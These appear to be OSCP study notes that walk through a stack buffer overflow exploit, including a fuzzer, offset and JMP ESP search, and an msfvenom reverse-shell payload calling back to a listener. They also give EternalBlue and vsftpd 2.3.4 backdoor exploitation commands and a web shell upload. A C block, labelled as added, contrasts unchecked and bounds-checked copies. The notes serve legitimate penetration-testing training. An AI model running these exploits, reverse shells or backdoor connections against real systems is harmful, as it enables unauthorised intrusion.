OSCP2026-04-21
Buffer Overflow - Concept
testsecurityoffensive
What Is It?
When more data is written to a buffer than it can hold, overwriting adjacent memory.
Why It Matters
- Foundational understanding
- CTF challenges
- Understanding exploits
- Memory corruption concepts
Note
Buffer overflow is optional on OSCP 2023+
Memory Layout
┌─────────────────────────────────────┐ High Memory
│ Stack                               │ ← Grows Down
│ (Local Variables)                   │
├─────────────────────────────────────┤
│                  ↓                  │
│                  ↑                  │
├─────────────────────────────────────┤
│ Heap                                │ ← Grows Up
├─────────────────────────────────────┤
│ Uninitialized Data (BSS)            │
├─────────────────────────────────────┤
│ Initialized Data                    │
├─────────────────────────────────────┤
│ Text (Code)                         │
└─────────────────────────────────────┘ Low Memory
Stack Frame
┌─────────────────────────────────────┐
│ Function Parameters                 │
├─────────────────────────────────────┤
│ Return Address (EIP)                │ ← Target!
├─────────────────────────────────────┤
│ Saved Base Pointer (EBP)            │
├─────────────────────────────────────┤
│ Local Variables                     │
│ Buffer                              │ ← Overflow here
└─────────────────────────────────────┘
Goal
Overwrite EIP to redirect execution to our shellcode.
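To make the stack-frame picture concrete, the following C program is an added example (it is not part of the original notes). It models the bottom of a frame as a fixed-size buffer with a trusted value stored directly above it, standing in for the saved EBP and return address. `copy_unchecked` is the vulnerable pattern (the sender's length drives the copy), and `copy_checked` is the hardened form that bounds the copy by the buffer size and rejects anything that does not fit. The struct, the `GUARD` constant and the 20-byte input are constructed for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16
#define GUARD 0xDEADBEEFu

/* Hypothetical frame layout: a local buffer with a value the program trusts
 * stored immediately above it (in a real frame: saved EBP, then return address). */
struct frame {
    char buf[BUF_SIZE];
    uint32_t saved_value;   /* stand-in for the saved EBP / return address */
};

/* Vulnerable pattern: the copy length comes from the input, not the buffer.
 * More than BUF_SIZE bytes spill into saved_value. (This is undefined behaviour
 * in C, which is exactly the bug being illustrated.) */
void copy_unchecked(struct frame *f, const char *src, size_t n)
{
    memcpy(f->buf, src, n);
}

/* Hardened pattern: the buffer size bounds the copy. Returns 0 on success and
 * -1 if the input (plus its terminating NUL) would not fit. */
int copy_checked(struct frame *f, const char *src, size_t n)
{
    if (n >= sizeof f->buf)
        return -1;
    memcpy(f->buf, src, n);
    f->buf[n] = '\0';
    return 0;
}

/* 1 if the trusted value above the buffer is still what it was. */
int frame_intact(const struct frame *f)
{
    return f->saved_value == GUARD;
}

/* Self-check: oversized input must be rejected and leave the frame intact. */
int checked_copy_rejects_oversize(void)
{
    char big[BUF_SIZE + sizeof(uint32_t)];          /* constructed: 20 x 'A' */
    memset(big, 'A', sizeof big);
    struct frame f = { {0}, GUARD };
    return copy_checked(&f, big, sizeof big) == -1 && frame_intact(&f);
}

/* Self-check: input that fits is copied, NUL-terminated, frame untouched. */
int checked_copy_accepts_fit(void)
{
    struct frame f = { {0}, GUARD };
    return copy_checked(&f, "hello", 5) == 0
        && strcmp(f.buf, "hello") == 0
        && frame_intact(&f);
}

int main(void)
{
    /* Constructed input: exactly buffer + the 4 trusted bytes above it. */
    char input[BUF_SIZE + sizeof(uint32_t)];
    memset(input, 'A', sizeof input);

    struct frame f = { {0}, GUARD };
    copy_unchecked(&f, input, sizeof input);
    printf("unchecked: saved_value = 0x%08x (%s)\n",
           (unsigned)f.saved_value,
           frame_intact(&f) ? "intact" : "overwritten with 0x41414141 = 'AAAA'");

    struct frame g = { {0}, GUARD };
    int rc = copy_checked(&g, input, sizeof input);
    printf("checked:   rc = %d, saved_value = 0x%08x (%s)\n",
           rc, (unsigned)g.saved_value,
           frame_intact(&g) ? "intact" : "overwritten");
    return 0;
}
```

The 0x41414141 that shows up in `saved_value` after the unchecked copy is the same "AAAA" pattern the debugger shows in EIP during the fuzzing step; the checked variant returns -1 and leaves it untouched, which is the property a bounds check has to guarantee.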
Buffer Overflow Steps
1. Fuzz → Find crash point
↓
2. Find Offset → Exact bytes to EIP
↓
3. Control EIP → Verify control
↓
4. Bad Chars → Find problematic bytes
↓
5. Find JMP ESP → Redirect execution
↓
6. Shellcode → Generate payload
↓
7. Exploit! → Get shell
BOF Step 1: Fuzzing
#!/usr/bin/python3
import socket

ip = "192.168.1.100"
port = 9999
buffer = "A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)                      # don't hang forever once the service stops answering
        s.connect((ip, port))
        s.send(("TRUN /.:/:" + buffer).encode())
        s.close()
        print(f"Sent {len(buffer)} bytes")   # report the size that was actually sent
        buffer += "A" * 100                  # grow by 100 bytes each round
    except OSError:                          # refused / timed out => service crashed
        print(f"Crashed at {len(buffer)} bytes")
        break
BOF Step 2: Find Offset
Generate Pattern
msf-pattern_create -l 3000
# or
!mona pattern_create 3000
Find Offset
# Check EIP value in debugger (e.g., 386F4337)
msf-pattern_offset -l 3000 -q 386F4337
# or
!mona findmsp -distance 3000
BOF Step 3: Control EIP
offset = 2003 # Found offset
buffer = "A" * offset
buffer += "B" * 4 # Should overwrite EIP
buffer += "C" * (3000 - len(buffer))
# Send and verify EIP = 42424242 (BBBB)
BOF Step 4: Bad Characters
Common Bad Characters
| Char | Hex | Reason |
|---|---|---|
| NULL | \x00 | String terminator |
| LF | \x0a | Line feed |
| CR | \x0d | Carriage return |
Testing
!mona bytearray -b "\x00"
!mona compare -f bytearray.bin -a <ESP>
BOF Step 5: Find JMP ESP
Using Mona
!mona jmp -r esp -cpb "\x00"
!mona modules # Find non-ASLR module
!mona find -s "\xff\xe4" -m module.dll
Requirements
- No ASLR
- No bad characters in address
- Executable memory
BOF Step 6-7: Shellcode & Exploit
Generate Shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 \
-b "\x00" -f python -v shellcode
Final Exploit
buffer = b"A" * offset                # offset found in Step 2
buffer += b"\xaf\x11\x50\x62"         # JMP ESP address (little-endian)
buffer += b"\x90" * 16                # NOP sled
buffer += shellcode                   # variable emitted by msfvenom -v shellcode in Step 6
SMB Exploitation
SMB Enumeration Recap
smbclient -L //192.168.1.100 -N
smbmap -H 192.168.1.100
enum4linux -a 192.168.1.100
crackmapexec smb 192.168.1.100 --shares
Common Vulnerabilities
- MS17-010 (EternalBlue)
- MS08-067
- Null sessions
- Weak credentials
EternalBlue (MS17-010)
Detection
nmap --script smb-vuln-ms17-010 192.168.1.100
Exploitation with Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.5
run
Manual Exploitation
searchsploit ms17-010
python eternalblue.py 192.168.1.100
FTP Exploitation
Enumeration
nmap --script ftp-anon,ftp-bounce 192.168.1.100
Common Attacks
# Anonymous login
ftp 192.168.1.100
> anonymous / anonymous@
# Version-specific exploits
searchsploit vsftpd 2.3.4
searchsploit proftpd 1.3.3
# Upload web shell (if writable)
put shell.php
vsftpd 2.3.4 Backdoor
Detection
nmap -sV -p21 192.168.1.100
# vsftpd 2.3.4
Exploitation
# Metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
run
# Manual
# Connect and login with :) in username
# Opens shell on port 6200
nc 192.168.1.100 6200